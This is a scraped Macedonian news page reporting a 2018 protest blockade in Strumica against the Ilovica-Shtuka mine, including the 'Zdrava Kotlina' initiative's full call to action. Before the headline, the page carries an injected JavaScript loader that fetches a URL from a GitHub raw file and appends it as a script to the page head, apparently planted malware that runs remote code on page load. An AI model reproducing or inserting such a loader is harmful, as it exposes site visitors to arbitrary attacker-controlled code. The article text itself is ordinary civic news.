;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Блокада: Сите против рудникот на смртта! - Антропол
АктуелноЛокално

Блокада: Сите против рудникот на смртта!

Иницијативата „Здрава Котлина” на својот фејсбук профил ја најави првата блокада, откако владата предводена од СДСМ и после две години од доаѓањето на власт одбива да го исполни предизборното ветување и да го затвори рудникот Иловица-Штука, за кој граѓаните од овој крај континуирано предупредуваат за катастрофалните последици кои ќе ги предизвика овој рудник врз егзистенцијата и опстанокот на регионот. Од иницијативата најавија понатамошна радикализација на отпорот поради немањето слух од претставниците на власта за основните потреби и барања на граѓаните. Во продолжение го пренесуваме целиот проглас од настанот.

„Драги сограѓани, зошто ве повикуваме на блокада?

Затоа што и по 20 месеци континуиран отпор против рудникот на смртта Иловица-Штука и интензивна аргументација од наша страна која ги докажува погубните последици од истиот, надлежните државни институции и натаму не застануваат во наша одбрана и не го раскинуваат договорот со концесионерот Еуромакс Рисорсис, иако имаат полно законско право на тоа.

Време е сами да се заштитиме од опасноста, во рамките на заедничка генерална акција под мотото СИТЕ ПРОТИВ РУДНИКОТ НА СМРТТА!

Првата активност ќе биде Предупредувачка Блокада на целокупниот сообраќај на кружниот тек на излезот од Струмица кон Бугарија (кај силосите), а воедно ќе биде блокиран и транзитниот пат. (Местото на тргнување кон локацијата на блокадата накнадно ќе го утврдиме).

Блокадата ќе се одржи на 10.11.2018 година, со почеток во 11:30 часот и ќе трае 2 часа Целта е на сите надлежни државни институции заеднички да им покажеме дека трпението е изминато и дека проблемот мора итно да се реши.

Немаме никакви политички заднини и дејствуваме исклучиво надполитички и надпартиски, како и досега. Воздухот, водата и почвата немаат партиска определба. Фаталните отрови и болестите предизвикани од нив не бираат според партиска припадност. Единствени барање од оваа блокада ќе бидат:

1) Итно одземање на концесијата на компанијата Еуромакс Рисорсис од страна на Владата на РМ и

2) Итно изгласување на измените во Законот за металични и минерални суровини од страна на Собранието на РМ.

Ова ќе биде прва и Предупредувачка Блокада и ве повикуваме масовно да учествувате и да се приклучите во отпорот против рудникот. Ние немаме намера да се селиме од нашите домови и нема да дозволиме нашите и животите на нашите поколенија да бидат загрозени од бескрупулозна компанија, чија единствена цел е профитот, по цена која сите ние крваво ќе ја платиме. Ќе блокираме и протестираме сѐ додека не се исполни нашата единствена цел.

СТОП ЗА РУДНИКОТ НА СМРТТА!”